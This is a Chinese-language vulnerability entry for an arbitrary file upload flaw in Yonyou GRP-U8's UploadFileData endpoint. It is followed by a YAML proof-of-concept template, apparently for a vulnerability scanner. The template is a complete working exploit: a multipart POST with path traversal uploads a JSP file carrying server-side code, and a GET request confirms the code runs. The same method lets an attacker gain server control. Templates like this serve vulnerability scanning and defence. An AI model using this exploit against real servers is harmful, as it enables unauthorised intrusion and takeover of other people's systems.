漏洞描述
用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限
app="用友-GRP-U8"
yonyou-grp-u8-upload-file-data: 用友 GRP-U8 UploadFileData 任意文件上传漏洞
PoC代码[已公开]
id: yonyou-grp-u8-upload-file-data
info:
name: 用友 GRP-U8 UploadFileData 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |
用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限
app="用友-GRP-U8"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
set:
rfilename: randomLowercase(4)
md5str: md5(rfilename)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename={{rfilename}}.jsp&filename=1.jpg
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"myFile\";filename=\"test.jpg\"\r\n\r\n<%out.print(\"{{md5str}}\");%>\r\n------WebKitFormBoundary{{rboundary}}--"
expression: response.status == 200 && response.body.bcontains(b'<script>') && response.body.bcontains(b'parent.showSucceedMsg();')
r1:
request:
method: GET
path: /R9iPortal/{{rfilename}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()